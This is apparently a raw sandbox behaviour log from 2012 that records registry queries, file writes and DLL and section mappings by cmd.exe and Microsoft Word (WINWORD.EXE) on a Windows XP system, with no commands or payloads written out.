Key value queried Path: HKEY_USERS\Software\Microsoft\Command Processor Name: PathCompletionChar object name not found 756901085
Key value queried Path: HKEY_USERS\Software\Microsoft\Command Processor Name: AutoRun object name not found 756901401
Memory allocated PID: 868 Path: C:\WINDOWS\system32\cmd.exe Base: 970000 Length: 13FE10 Allocation Type: unknown Protection: page read and write success or wait 756911898
File opened Path: nul Access: read attributes and synchronize and generic write Options: synchronous io non alert and non directory file Attributes: normal Content Overwritten: true success or wait 756917204
File deleted Path: C:\DOCUME~1\ADMINI~1\LOCALS~1\~WORDL.tmp New path: Disposition: Data : success or wait 756923585
General
Start time: 15:20:42
Start date: 24/07/2012
Path: C:\Program Files\Microsoft Office\OFFICE11\WINWORD.EXE
Wow64 process (32bit): false
Commandline: C:\Program Files\Microsoft Office\OFFICE11\WINWORD.EXE /n /dde
Imagebase: 0x30000000
File size: 12310368 bytes
MD5 hash: 443747857245BF90847AE396C53470A6

File Activities

File Path Access Options Content overwritten Completion Count Source Address Symbol
File Path Access Attributes Options Completion Count Source Address Symbol
File Path Completion Count Source Address Symbol
C:\Documents and Settings\Administrator\Application Data\Microsoft\Proof\~$CUSTOM.DIC success or wait 2 300D5696 DeleteFileW
C:\Documents and Settings\Administrator\Application Data\Microsoft\Proof\CUSTOM.DIC success or wait 1 300D5696 DeleteFileW
Old File Path New File Path Completion Count Source Address Symbol
C:\Documents and Settings\Administrator\Application Data\Microsoft\Proof\~WRI0002 C:\Documents and Settings\Administrator\Application Data\Microsoft\Proof\CUSTOM.DIC success or wait 1 300AFF20 MoveFileW
File Path Offset Length Value Completion Count Source Address Symbol
C:\DOCUME~1\ADMINI~1\LOCALS~1\~$hone 5.doc unknown 54 0D 48 61 6E 75 65 6C 65 20 42 61 73 65 72 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 success or wait 1 30041F40 WriteFile
C:\DOCUME~1\ADMINI~1\LOCALS~1\~$hone 5.doc unknown 108 0D 00 48 00 61 00 6E 00 75 00 65 00 6C 00 65 00 20 00 42 00 61 00 73 00 65 00 72 00 00 00 00 00 16 00 00 00 F8 00 06 00 3E 01 0A 00 A0 00 00 00 00 00 00 00 00 00 00 00 00 00 FF FF 02 00 00 00 00 00 00 00 74 47 0C 00 FF FF FF FF FF FF 0C 00 5C 00 00 00 03 00 00 00 04 00 00 00 08 00 00 00 04 00 00 00 success or wait 1 30041F40 WriteFile
C:\Documents and Settings\Administrator\Application Data\Microsoft\Proof\~$CUSTOM.DIC unknown 54 0D 48 61 6E 75 65 6C 65 20 42 61 73 65 72 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 success or wait 2 30041F40 WriteFile
C:\Documents and Settings\Administrator\Application Data\Microsoft\Proof\~$CUSTOM.DIC unknown 108 0D 00 48 00 61 00 6E 00 75 00 65 00 6C 00 65 00 20 00 42 00 61 00 73 00 65 00 72 00 00 00 00 00 20 00 00 00 00 00 00 00 04 00 00 00 04 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 06 00 00 00 00 00 03 00 01 00 0C 00 5C 00 00 00 03 00 00 00 04 00 00 00 08 00 00 00 04 00 00 00 success or wait 2 30041F40 WriteFile
File Path Disposition Data Ascii Data Completion Count Source Address Symbol
C:\Documents and Settings\Administrator\Application Data\Microsoft\Proof\CUSTOM.DIC PositionInformation Offset: 0 success or wait 4 301E47C6 SetFilePointer

Section Activities

File Path Access Type Base Size Mapped to pid Protection Completion Count
\KnownDlls\kernel32.dll write and read and execute unknown 7C800000 1007616 own pid read write success or wait 1
unknown query and write and read and execute and extend size reserve 7C800000 1007616 own pid read write success or wait 1
\NLS\NlsSectionUnicode read unknown 260000 90112 own pid readonly success or wait 1
\NLS\NlsSectionLocale read unknown 280000 266240 own pid readonly success or wait 1
\NLS\NlsSectionSortkey query and read unknown 2D0000 266240 own pid readonly success or wait 1
\NLS\NlsSectionSortTbls read unknown 320000 24576 own pid readonly success or wait 1
\NLS\NlsSectionSortkey00000409 read unknown unknown unknown unknown unknown object name not found 1
\NLS\NlsSectionSortkey00000409 read unknown unknown unknown unknown unknown object name not found 1
\KnownDlls\ADVAPI32.dll write and read and execute unknown 77DD0000 634880 own pid read write success or wait 1
\KnownDlls\RPCRT4.dll write and read and execute unknown 77E70000 602112 own pid read write success or wait 1
\KnownDlls\Secur32.dll write and read and execute unknown 77FE0000 69632 own pid read write success or wait 1
\KnownDlls\GDI32.dll write and read and execute unknown 77F10000 299008 own pid read write success or wait 1
\KnownDlls\USER32.dll write and read and execute unknown 7E410000 593920 own pid read write success or wait 1
\KnownDlls\ole32.dll write and read and execute unknown 774E0000 1302528 own pid read write success or wait 1
\KnownDlls\msvcrt.dll write and read and execute unknown 77C10000 360448 own pid read write success or wait 1
\KnownDlls\VERSION.dll write and read and execute unknown 77C00000 32768 own pid read write success or wait 1
C:\WINDOWS\system32\imm32.dll write and read and execute commit 410000 110592 own pid execute success or wait 1
C:\WINDOWS\system32\imm32.dll write and read and execute commit 410000 110592 own pid execute success or wait 1
C:\WINDOWS\system32\imm32.dll query and write and read and execute image 76390000 118784 own pid read write success or wait 1
\NLS\NlsSectionCType read unknown 850000 12288 own pid readonly success or wait 1
\KnownDlls\psapi.dll write and read and execute unknown unknown unknown unknown unknown object name not found 1
C:\WINDOWS\system32\psapi.dll query and write and read and execute image 76BF0000 45056 own pid read write success or wait 1
C:\Program Files\Microsoft Office\OFFICE11\1033\WWINTL.DLL write and read and execute commit 8D0000 778240 own pid execute success or wait 1
C:\Program Files\Microsoft Office\OFFICE11\1033\WWINTL.DLL query and read commit 8D0000 778240 own pid readonly success or wait 1
\BaseNamedObjects\Local\Mso97SharedDg19211108172 query and write and read and execute and extend size unknown unknown unknown unknown unknown object name not found 1
\BaseNamedObjects\Local\Mso97SharedDg19211108172 query and write and read reserve A20000 126976 own pid read write success or wait 1
\KnownDlls\uxtheme.dll write and read and execute unknown unknown unknown unknown unknown object name not found 1
C:\WINDOWS\system32\uxtheme.dll query and write and read and execute image 5AD70000 229376 own pid read write success or wait 1
C:\WINDOWS\system32\msctf.dll write and read and execute commit A60000 299008 own pid execute success or wait 1
C:\WINDOWS\system32\msctf.dll query and write and read and execute image 74720000 311296 own pid read write success or wait 1
\BaseNamedObjects\CiceroSharedMemDefaultS-1-5-21-507921405-1960408961-839522115-500 query and write and read commit unknown unknown unknown unknown object name exists 1
\BaseNamedObjects\CTF.TimListCache.FMPDefaultS-1-5-21-507921405-1960408961-839522115-500SFM.DefaultS-1-5-21-507921405-1960408961-839522115-500 query and write and read and execute and extend size unknown A60000 262144 own pid read write success or wait 1
C:\WINDOWS\system32\msctfime.ime write and read and execute commit AA0000 180224 own pid execute success or wait 1
C:\WINDOWS\system32\msctfime.ime query and read commit AA0000 180224 own pid readonly success or wait 1
C:\WINDOWS\system32\msctfime.ime write and read and execute commit AA0000 180224 own pid execute success or wait 1
C:\WINDOWS\system32\msctfime.ime query and read commit AA0000 180224 own pid readonly success or wait 1
C:\WINDOWS\system32\msctfime.ime write and read and execute commit AA0000 180224 own pid execute success or wait 1
C:\WINDOWS\system32\msctfime.ime query and write and read and execute image 755C0000 188416 own pid read write success or wait 1
C:\Program Files\Common Files\Microsoft Shared\OFFICE11\1033\MSOINTL.DLL write and read and execute commit AB0000 1757184 own pid execute success or wait 1
C:\Program Files\Common Files\Microsoft Shared\OFFICE11\1033\MSOINTL.DLL query and read commit AB0000 1757184 own pid readonly success or wait 1
\BaseNamedObjects\Local\Mso97SharedDg20321108172 query and write and read and execute and extend size unknown unknown unknown unknown unknown object name not found 1
\BaseNamedObjects\Local\Mso97SharedDg20321108172 query and write and read reserve C60000 126976 own pid read write success or wait 1
C:\WINDOWS\system32\rpcss.dll write and read and execute commit CF0000 401408 own pid execute success or wait 1
\KnownDlls\SHELL32.dll write and read and execute unknown 7C9C0000 8482816 own pid read write success or wait 1
C:\WINDOWS\system32\shell32.dll read commit CF0000 8462336 own pid readonly success or wait 1
\KnownDlls\comctl32.dll write and read and execute unknown 5D090000 630784 own pid read write success or wait 1
C:\WINDOWS\system32\comctl32.dll read commit CF0000 618496 own pid readonly success or wait 1
\BaseNamedObjects\DfSharedHeap3B051 query and write and read reserve DA0000 4194304 own pid read write success or wait 1
\BaseNamedObjects\DFMap0-241752 query and write and read commit D10000 524288 own pid read write success or wait 1
\BaseNamedObjects\DfRoot00003B051 query and write and read commit 11A0000 4096 own pid read write success or wait 1
\BaseNamedObjects\DFMap0-241775 query and write and read commit 11B0000 524288 own pid read write success or wait 1
C:\Program Files\Common Files\Microsoft Shared\OFFICE11\RICHED20.DLL write and read and execute commit 1240000 1105920 own pid execute success or wait 1
C:\Program Files\Common Files\Microsoft Shared\OFFICE11\RICHED20.DLL query and write and read and execute image 39700000 1097728 own pid read write success or wait 1
\KnownDlls\OLEAUT32.dll write and read and execute unknown 77120000 569344 own pid read write success or wait 1
C:\WINDOWS\system32\msimtf.dll write and read and execute commit 1300000 159744 own pid execute success or wait 1
C:\WINDOWS\system32\msimtf.dll write and read and execute commit 1300000 159744 own pid execute success or wait 1
C:\WINDOWS\system32\msimtf.dll write and read and execute commit 1300000 159744 own pid execute success or wait 1
C:\WINDOWS\system32\msimtf.dll write and read and execute commit 1300000 159744 own pid execute success or wait 1
\BaseNamedObjects\CTF.AsmListCache.FMPDefaultS-1-5-21-507921405-1960408961-839522115-500 query and write and read and execute and extend size unknown 1300000 4096 own pid read write success or wait 1
\KnownDlls\CLBCATQ.DLL write and read and execute unknown unknown unknown unknown unknown object name not found 1
C:\WINDOWS\system32\clbcatq.dll query and write and read and execute image 76FD0000 520192 own pid read write success or wait 1
\KnownDlls\COMRes.dll write and read and execute unknown unknown unknown unknown unknown object name not found 1
C:\WINDOWS\system32\comres.dll query and write and read and execute image 77050000 806912 own pid read write success or wait 1
\BaseNamedObjects\MSCTF.MarshalInterface.FileMap.ENF..CJJCD query and write and read commit 1330000 4096 own pid read write success or wait 1
\BaseNamedObjects\MSCTF.Shared.SFM.MNH query and write and read and execute and extend size unknown 1340000 524288 own pid read write success or wait 1
\BaseNamedObjects\MSCTF.MarshalInterface.FileMap.ENF.B.CJJCD query and write and read commit 1330000 4096 own pid read write success or wait 1
\BaseNamedObjects\MSCTF.MarshalInterface.FileMap.ENF.C.CJJCD query and write and read commit 13C0000 4096 own pid read write success or wait 1
\BaseNamedObjects\MSCTF.MarshalInterface.FileMap.ENF.D.CJJCD query and write and read commit 13D0000 4096 own pid read write success or wait 1
\BaseNamedObjects\MSCTF.MarshalInterface.FileMap.ENF.E.CJJCD query and write and read commit 1330000 4096 own pid read write success or wait 1
\BaseNamedObjects\Local\Mso97SharedDg19521108172 query and write and read and execute and extend size unknown unknown unknown unknown unknown object name not found 1
\BaseNamedObjects\Local\Mso97SharedDg19521108172 query and write and read reserve 13E0000 126976 own pid read write success or wait 1
\BaseNamedObjects\MSCTF.MarshalInterface.FileMap.ENF.F.AMJCD query and write and read commit 1330000 4096 own pid read write success or wait 1
\BaseNamedObjects\Local\Mso97SharedDg19521108172 query and write and read and execute and extend size unknown 1400000 126976 own pid read write success or wait 1
\BaseNamedObjects\Local\Mso97SharedDg19531108172 query and write and read and execute and extend size unknown unknown unknown unknown unknown object name not found 1
\BaseNamedObjects\Local\Mso97SharedDg19531108172 query and write and read reserve 1400000 126976 own pid read write success or wait 1
\BaseNamedObjects\MSCTF.MarshalInterface.FileMap.ENF.G.ANJCD query and write and read commit 1330000 4096 own pid read write success or wait 1
\BaseNamedObjects\MSCTF.MarshalInterface.FileMap.MNH.FB.ANJCD query and write and read and execute and extend size unknown 1330000 4096 own pid read write success or wait 1
\BaseNamedObjects\MSCTF.MarshalInterface.FileMap.MNH.GB.ANJCD query and write and read and execute and extend size unknown 1330000 4096 own pid read write success or wait 1
\BaseNamedObjects\MSCTF.MarshalInterface.FileMap.MNH.HB.ANJCD query and write and read and execute and extend size unknown 1330000 4096 own pid read write success or wait 1
\KnownDlls\msi.dll write and read and execute unknown unknown unknown unknown unknown object name not found 1
C:\WINDOWS\system32\msi.dll query and write and read and execute image 7D1E0000 2867200 own pid read write success or wait 1
\KnownDlls\SETUPAPI.dll write and read and execute unknown unknown unknown unknown unknown object name not found 1
C:\WINDOWS\system32\setupapi.dll query and write and read and execute image 77920000 995328 own pid read write success or wait 1
\BaseNamedObjects\DfSharedHeap3B5CC query and write and read reserve 1420000 4194304 own pid read write success or wait 1
\BaseNamedObjects\DFMap0-243156 query and write and read commit 1820000 524288 own pid read write success or wait 1
\BaseNamedObjects\DfRoot00003B5CC query and write and read commit 13D0000 4096 own pid read write success or wait 1
\BaseNamedObjects\DFMap0-243174 query and write and read commit 18A0000 524288 own pid read write success or wait 1
\KnownDlls\USERENV.dll write and read and execute unknown 769C0000 737280 own pid read write success or wait 1
\BaseNamedObjects\Local\MSO_Formal11108172_S-1-5-21-507921405-1960408961-839522115-500 query and write and read and execute and extend size unknown unknown unknown unknown unknown object name not found 1
\BaseNamedObjects\Local\MSO_Formal11108172_S-1-5-21-507921405-1960408961-839522115-500 query and write and read commit 1920000 8192 own pid read write success or wait 1
\BaseNamedObjects\Local\MSO_AdHoc11108172_S-1-5-21-507921405-1960408961-839522115-500 query and write and read and execute and extend size unknown unknown unknown unknown unknown object name not found 1
\BaseNamedObjects\Local\MSO_AdHoc11108172_S-1-5-21-507921405-1960408961-839522115-500 query and write and read commit 1930000 8192 own pid read write success or wait 1
C:\WINDOWS\system32\msimtf.dll write and read and execute commit 1980000 159744 own pid execute success or wait 1
\BaseNamedObjects\Global\RotHintTable read unknown 1980000 4096 own pid readonly success or wait 1
C:\WINDOWS\system32\winlogon.exe write and read and execute commit 1990000 507904 own pid execute success or wait 1
\KnownDlls\xpsp2res.dll write and read and execute unknown unknown unknown unknown unknown object name not found 1
C:\WINDOWS\system32\xpsp2res.dll query and write and read and execute image 1990000 2904064 own pid read write conflicting addresses 1
\KnownDlls\LINKINFO.dll write and read and execute unknown unknown unknown unknown unknown object name not found 1
C:\WINDOWS\system32\linkinfo.dll query and write and read and execute image 76980000 32768 own pid read write success or wait 1
\KnownDlls\ntshrui.dll write and read and execute unknown unknown unknown unknown unknown object name not found 1
C:\WINDOWS\system32\ntshrui.dll query and write and read and execute image 76990000 151552 own pid read write success or wait 1
\KnownDlls\ATL.DLL write and read and execute unknown unknown unknown unknown unknown object name not found 1
C:\WINDOWS\system32\atl.dll query and write and read and execute image 76B20000 69632 own pid read write success or wait 1
\KnownDlls\NETAPI32.dll write and read and execute unknown unknown unknown unknown unknown object name not found 1
C:\WINDOWS\system32\netapi32.dll query and write and read and execute image 5B860000 348160 own pid read write success or wait 1
C:\WINDOWS\system32\ntshrui.dll read commit 1E70000 143360 own pid readonly success or wait 1
unknown query and write and read commit 1E70000 4096 own pid read write success or wait 1
unknown query and write and read commit 1E70000 4096 own pid read write success or wait 1
unknown query and write and read commit 1E70000 4096 own pid read write success or wait 1
unknown query and write and read commit 1E70000 4096 own pid read write success or wait 1
unknown query and write and read commit 1E70000 4096 own pid read write success or wait 1
unknown query and write and read commit 1E70000 4096 own pid read write success or wait 1
unknown query and write and read commit 1E70000 4096 own pid read write success or wait 1
unknown query and write and read commit 1E70000 4096 own pid read write success or wait 1
C:\PROGRA~1\COMMON~1\MICROS~1\SMARTT~1\FNAME.DLL write and read and execute commit 1E70000 131072 own pid execute success or wait 1
C:\PROGRA~1\COMMON~1\MICROS~1\SMARTT~1\FNAME.DLL query and write and read and execute image 37320000 143360 own pid read write success or wait 1
\KnownDlls\WINSPOOL.DRV write and read and execute unknown unknown unknown unknown unknown object name not found 1
C:\WINDOWS\system32\winspool.drv query and write and read and execute image 73000000 155648 own pid read write success or wait 1
\KnownDlls\OLEACC.dll write and read and execute unknown unknown unknown unknown unknown object name not found 1
C:\WINDOWS\system32\oleacc.dll query and write and read and execute image 74C80000 180224 own pid read write success or wait 1
\KnownDlls\MSVCP60.dll write and read and execute unknown unknown unknown unknown unknown object name not found 1
C:\WINDOWS\system32\msvcp60.dll query and write and read and execute image 76080000 413696 own pid read write success or wait 1
C:\WINDOWS\system32\oleaccrc.dll query and read commit 1E80000 20480 own pid readonly success or wait 1
\KnownDlls\SXS.DLL write and read and execute unknown unknown unknown unknown unknown object name not found 1
C:\WINDOWS\system32\sxs.dll query and write and read and execute image 7E720000 720896 own pid read write success or wait 1
C:\PROGRA~1\COMMON~1\MICROS~1\SMARTT~1\FNAME.DLL query and read commit 1FB0000 49152 own pid readonly success or wait 1
C:\WINDOWS\system32\stdole2.tlb query and read commit 1FC0000 16384 own pid readonly success or wait 1
C:\PROGRA~1\COMMON~1\MICROS~1\SMARTT~1\1033\STINTL.DLL write and read and execute commit 1FD0000 24576 own pid execute success or wait 1
C:\PROGRA~1\COMMON~1\MICROS~1\SMARTT~1\1033\STINTL.DLL query and write and read and execute image 374B0000 24576 own pid read write success or wait 1
C:\Program Files\Common Files\Microsoft Shared\PROOF\MSLID.DLL write and read and execute commit 21F0000 536576 own pid execute success or wait 1
C:\Program Files\Common Files\Microsoft Shared\PROOF\MSLID.DLL query and write and read and execute image 507C0000 540672 own pid read write success or wait 1
C:\Program Files\Common Files\Microsoft Shared\PROOF\MSSPELL3.DLL write and read and execute commit 2600000 86016 own pid execute success or wait 1
C:\Program Files\Common Files\Microsoft Shared\PROOF\MSSPELL3.DLL query and write and read and execute image 3F000000 86016 own pid read write success or wait 1
\BaseNamedObjects\DfSharedHeap3C40F query and write and read reserve 2610000 4194304 own pid read write success or wait 1
\BaseNamedObjects\DfSharedHeap3C42C query and write and read reserve 2610000 4194304 own pid read write success or wait 1
\BaseNamedObjects\DfSharedHeap3C440 query and write and read reserve 2610000 4194304 own pid read write success or wait 1
C:\Program Files\Common Files\Microsoft Shared\PROOF\MSSP3EN.LEX query and read commit 2610000 462848 own pid readonly success or wait 1
C:\Program Files\Common Files\Microsoft Shared\PROOF\MSGR3EN.LEX query and read commit 2830000 3788800 own pid readonly success or wait 1
C:\WINDOWS\system32\spool\drivers\w32x86\3\unidrvui.dll write and read and execute commit 2ED0000 745472 own pid execute success or wait 1
C:\WINDOWS\system32\spool\drivers\w32x86\3\unidrvui.dll query and write and read and execute image 7E5A0000 761856 own pid read write success or wait 1
C:\WINDOWS\system32\spool\drivers\w32x86\3\mxdwdui.BUD query and read commit 2ED0000 61440 own pid readonly success or wait 1
C:\WINDOWS\system32\spool\drivers\w32x86\3\mxdwdui.ini query and read commit 2EE0000 4096 own pid readonly success or wait 1
C:\WINDOWS\system32\spool\drivers\w32x86\3\mxdwdui.dll write and read and execute commit 2EE0000 200704 own pid execute success or wait 1
C:\WINDOWS\system32\spool\drivers\w32x86\3\mxdwdui.dll query and write and read and execute image 3F960000 212992 own pid read write success or wait 1
C:\WINDOWS\system32\spool\drivers\w32x86\3\mxdwdui.BUD query and read commit 2ED0000 61440 own pid readonly success or wait 1
C:\WINDOWS\system32\spool\drivers\w32x86\3\mxdwdui.ini query and read commit 2EE0000 4096 own pid readonly success or wait 1
C:\WINDOWS\system32\spool\drivers\w32x86\3\mxdwdui.dll write and read and execute commit 2EE0000 200704 own pid execute success or wait 1
C:\WINDOWS\system32\spool\drivers\w32x86\3\mxdwdui.dll query and write and read and execute image 3F960000 212992 own pid read write success or wait 1
C:\WINDOWS\system32\spool\drivers\w32x86\3\mxdwdui.BUD query and read commit 2ED0000 61440 own pid readonly success or wait 1
C:\WINDOWS\system32\spool\drivers\w32x86\3\mxdwdui.ini query and read commit 2EE0000 4096 own pid readonly success or wait 1
C:\WINDOWS\system32\spool\drivers\w32x86\3\mxdwdui.dll write and read and execute commit 2EE0000 200704 own pid execute success or wait 1
C:\WINDOWS\system32\spool\drivers\w32x86\3\mxdwdui.dll query and write and read and execute image 3F960000 212992 own pid read write success or wait 1
C:\WINDOWS\system32\spool\drivers\w32x86\3\mxdwdrv.dll write and read and execute commit 2ED0000 765952 own pid execute success or wait 1
C:\WINDOWS\system32\spool\drivers\w32x86\3\mxdwdrv.dll query and write and read and execute image 3F500000 786432 own pid read write success or wait 1
C:\WINDOWS\system32\spool\drivers\w32x86\3\mxdwdui.BUD query and read commit 2EE0000 61440 own pid readonly success or wait 1
C:\WINDOWS\system32\spool\drivers\w32x86\3\mxdwdui.ini query and read commit 2EF0000 4096 own pid readonly success or wait 1
C:\WINDOWS\system32\spool\drivers\w32x86\3\mxdwdui.dll write and read and execute commit 2EF0000 200704 own pid execute success or wait 1
C:\WINDOWS\system32\spool\drivers\w32x86\3\mxdwdui.dll query and write and read and execute image 3F960000 212992 own pid read write success or wait 1
C:\WINDOWS\system32\spool\drivers\w32x86\3\mxdwdui.BUD query and read commit 2EE0000 61440 own pid readonly success or wait 1
C:\WINDOWS\system32\spool\drivers\w32x86\3\mxdwdui.ini query and read commit 2EF0000 4096 own pid readonly success or wait 1
C:\WINDOWS\system32\spool\drivers\w32x86\3\mxdwdui.dll write and read and execute commit 2EF0000 200704 own pid execute success or wait 1
C:\WINDOWS\system32\spool\drivers\w32x86\3\mxdwdui.dll query and write and read and execute image 3F960000 212992 own pid read write success or wait 1
C:\WINDOWS\system32\spool\drivers\w32x86\3\mxdwdui.BUD query and read commit 32E0000 61440 own pid readonly success or wait 1
C:\WINDOWS\system32\spool\drivers\w32x86\3\mxdwdui.ini query and read commit 32F0000 4096 own pid readonly success or wait 1
C:\WINDOWS\system32\spool\drivers\w32x86\3\mxdwdui.dll write and read and execute commit 32F0000 200704 own pid execute success or wait 1
C:\WINDOWS\system32\spool\drivers\w32x86\3\mxdwdui.dll query and write and read and execute image 3F960000 212992 own pid read write success or wait 1
C:\WINDOWS\system32\spool\drivers\w32x86\3\mxdwdui.BUD query and read commit 32E0000 61440 own pid readonly success or wait 1
C:\WINDOWS\system32\spool\drivers\w32x86\3\mxdwdui.ini query and read commit 32F0000 4096 own pid readonly success or wait 1
C:\WINDOWS\system32\spool\drivers\w32x86\3\mxdwdui.dll write and read and execute commit 32F0000 200704 own pid execute success or wait 1
C:\WINDOWS\system32\spool\drivers\w32x86\3\mxdwdui.dll query and write and read and execute image 3F960000 212992 own pid read write success or wait 1
C:\WINDOWS\system32\spool\drivers\w32x86\3\mxdwdui.BUD query and read commit 32E0000 61440 own pid readonly success or wait 1
C:\WINDOWS\system32\spool\drivers\w32x86\3\mxdwdui.ini query and read commit 32F0000 4096 own pid readonly success or wait 1
C:\WINDOWS\system32\spool\drivers\w32x86\3\mxdwdui.dll write and read and execute commit 32F0000 200704 own pid execute success or wait 1
C:\WINDOWS\system32\spool\drivers\w32x86\3\mxdwdui.dll query and write and read and execute image 3F960000 212992 own pid read write success or wait 1
C:\WINDOWS\system32\spool\drivers\w32x86\3\mxdwdui.BUD query and read commit 32E0000 61440 own pid readonly success or wait 1
C:\WINDOWS\system32\spool\drivers\w32x86\3\mxdwdui.ini query and read commit 32F0000 4096 own pid readonly success or wait 1
C:\WINDOWS\system32\spool\drivers\w32x86\3\mxdwdui.dll write and read and execute commit 32F0000 200704 own pid execute success or wait 1
C:\WINDOWS\system32\spool\drivers\w32x86\3\mxdwdui.dll query and write and read and execute image 3F960000 212992 own pid read write success or wait 1
C:\WINDOWS\system32\spool\drivers\w32x86\3\mxdwdui.BUD query and read commit 32E0000 61440 own pid readonly success or wait 1
C:\WINDOWS\system32\spool\drivers\w32x86\3\mxdwdui.ini query and read commit 32F0000 4096 own pid readonly success or wait 1
C:\WINDOWS\system32\spool\drivers\w32x86\3\mxdwdui.dll write and read and execute commit 32F0000 200704 own pid execute success or wait 1
C:\WINDOWS\system32\spool\drivers\w32x86\3\mxdwdui.dll query and write and read and execute image 3F960000 212992 own pid read write success or wait 1
C:\WINDOWS\system32\fontsub.dll write and read and execute commit 32E0000 81920 own pid execute success or wait 1
C:\WINDOWS\system32\fontsub.dll query and write and read and execute image 69310000 94208 own pid read write success or wait 1
C:\WINDOWS\system32\spool\drivers\w32x86\3\mxdwdui.BUD query and read commit 32E0000 61440 own pid readonly success or wait 1
C:\WINDOWS\system32\spool\drivers\w32x86\3\mxdwdui.ini query and read commit 32F0000 4096 own pid readonly success or wait 1
C:\WINDOWS\system32\spool\drivers\w32x86\3\mxdwdui.dll write and read and execute commit 32F0000 200704 own pid execute success or wait 1
C:\WINDOWS\system32\spool\drivers\w32x86\3\mxdwdui.dll query and write and read and execute image 3F960000 212992 own pid read write success or wait 1
C:\WINDOWS\system32\spool\drivers\w32x86\3\mxdwdui.BUD query and read commit 32E0000 61440 own pid readonly success or wait 1
C:\WINDOWS\system32\spool\drivers\w32x86\3\mxdwdui.ini query and read commit 32F0000 4096 own pid readonly success or wait 1
C:\WINDOWS\system32\spool\drivers\w32x86\3\mxdwdui.dll write and read and execute commit 32F0000 200704 own pid execute success or wait 1
C:\WINDOWS\system32\spool\drivers\w32x86\3\mxdwdui.dll query and write and read and execute image 3F960000 212992 own pid read write success or wait 1
C:\WINDOWS\system32\spool\drivers\w32x86\3\mxdwdui.BUD query and read commit 32E0000 61440 own pid readonly success or wait 1
C:\WINDOWS\system32\spool\drivers\w32x86\3\mxdwdui.ini query and read commit 32F0000 4096 own pid readonly success or wait 1
C:\WINDOWS\system32\spool\drivers\w32x86\3\mxdwdui.dll write and read and execute commit 32F0000 200704 own pid execute success or wait 1
C:\WINDOWS\system32\spool\drivers\w32x86\3\mxdwdui.dll query and write and read and execute image 3F960000 212992 own pid read write success or wait 1
C:\WINDOWS\system32\spool\drivers\w32x86\3\mxdwdui.BUD query and read commit 32E0000 61440 own pid readonly success or wait 1
C:\WINDOWS\system32\spool\drivers\w32x86\3\mxdwdui.ini query and read commit 32F0000 4096 own pid readonly success or wait 1
C:\WINDOWS\system32\spool\drivers\w32x86\3\mxdwdui.dll write and read and execute commit 32F0000 200704 own pid execute success or wait 1
C:\WINDOWS\system32\spool\drivers\w32x86\3\mxdwdui.dll query and write and read and execute image 3F960000 212992 own pid read write success or wait 1
C:\WINDOWS\system32\spool\drivers\w32x86\3\mxdwdui.BUD query and read commit 32E0000 61440 own pid readonly success or wait 1
C:\WINDOWS\system32\spool\drivers\w32x86\3\mxdwdui.ini query and read commit 32F0000 4096 own pid readonly success or wait 1
C:\WINDOWS\system32\spool\drivers\w32x86\3\mxdwdui.dll write and read and execute commit 32F0000 200704 own pid execute success or wait 1
C:\WINDOWS\system32\spool\drivers\w32x86\3\mxdwdui.dll query and write and read and execute image 3F960000 212992 own pid read write success or wait 1
C:\WINDOWS\system32\spool\drivers\w32x86\3\mxdwdui.BUD query and read commit 32E0000 61440 own pid readonly success or wait 1
C:\WINDOWS\system32\spool\drivers\w32x86\3\mxdwdui.ini query and read commit 32F0000 4096 own pid readonly success or wait 1
C:\WINDOWS\system32\spool\drivers\w32x86\3\mxdwdui.dll write and read and execute commit 32F0000 200704 own pid execute success or wait 1
C:\WINDOWS\system32\spool\drivers\w32x86\3\mxdwdui.dll query and write and read and execute image 3F960000 212992 own pid read write success or wait 1
C:\WINDOWS\system32\spool\drivers\w32x86\3\mxdwdui.BUD query and read commit 32E0000 61440 own pid readonly success or wait 1
C:\WINDOWS\system32\spool\drivers\w32x86\3\mxdwdui.ini query and read commit 32F0000 4096 own pid readonly success or wait 1
C:\WINDOWS\system32\spool\drivers\w32x86\3\mxdwdui.dll write and read and execute commit 32F0000 200704 own pid execute success or wait 1
C:\WINDOWS\system32\spool\drivers\w32x86\3\mxdwdui.dll query and write and read and execute image 3F960000 212992 own pid read write success or wait 1
C:\WINDOWS\system32\spool\drivers\w32x86\3\mxdwdui.BUD query and read commit 32E0000 61440 own pid readonly success or wait 1
C:\WINDOWS\system32\spool\drivers\w32x86\3\mxdwdui.ini query and read commit 32F0000 4096 own pid readonly success or wait 1
C:\WINDOWS\system32\spool\drivers\w32x86\3\mxdwdui.dll write and read and execute commit 32F0000 200704 own pid execute success or wait 1
C:\WINDOWS\system32\spool\drivers\w32x86\3\mxdwdui.dll query and write and read and execute image 3F960000 212992 own pid read write success or wait 1
C:\WINDOWS\system32\spool\drivers\w32x86\3\mxdwdui.BUD query and read commit 32E0000 61440 own pid readonly success or wait 1
C:\WINDOWS\system32\spool\drivers\w32x86\3\mxdwdui.ini query and read commit 32F0000 4096 own pid readonly success or wait 1
C:\WINDOWS\system32\spool\drivers\w32x86\3\mxdwdui.dll write and read and execute commit 32F0000 200704 own pid execute success or wait 1
C:\WINDOWS\system32\spool\drivers\w32x86\3\mxdwdui.dll query and write and read and execute image 3F960000 212992 own pid read write success or wait 1
C:\WINDOWS\system32\spool\drivers\w32x86\3\mxdwdui.BUD query and read commit 32E0000 61440 own pid readonly success or wait 1
C:\WINDOWS\system32\spool\drivers\w32x86\3\mxdwdui.ini query and read commit 32F0000 4096 own pid readonly success or wait 1
C:\WINDOWS\system32\spool\drivers\w32x86\3\mxdwdui.dll write and read and execute commit 32F0000 200704 own pid execute success or wait 1
C:\WINDOWS\system32\spool\drivers\w32x86\3\mxdwdui.dll query and write and read and execute image 3F960000 212992 own pid read write success or wait 1
C:\WINDOWS\system32\spool\drivers\w32x86\3\mxdwdui.BUD query and read commit 32E0000 61440 own pid readonly success or wait 1
C:\WINDOWS\system32\spool\drivers\w32x86\3\mxdwdui.ini query and read commit 32F0000 4096 own pid readonly success or wait 1
C:\WINDOWS\system32\spool\drivers\w32x86\3\mxdwdui.dll write and read and execute commit 32F0000 200704 own pid execute success or wait 1
C:\WINDOWS\system32\spool\drivers\w32x86\3\mxdwdui.dll query and write and read and execute image 3F960000 212992 own pid read write success or wait 1
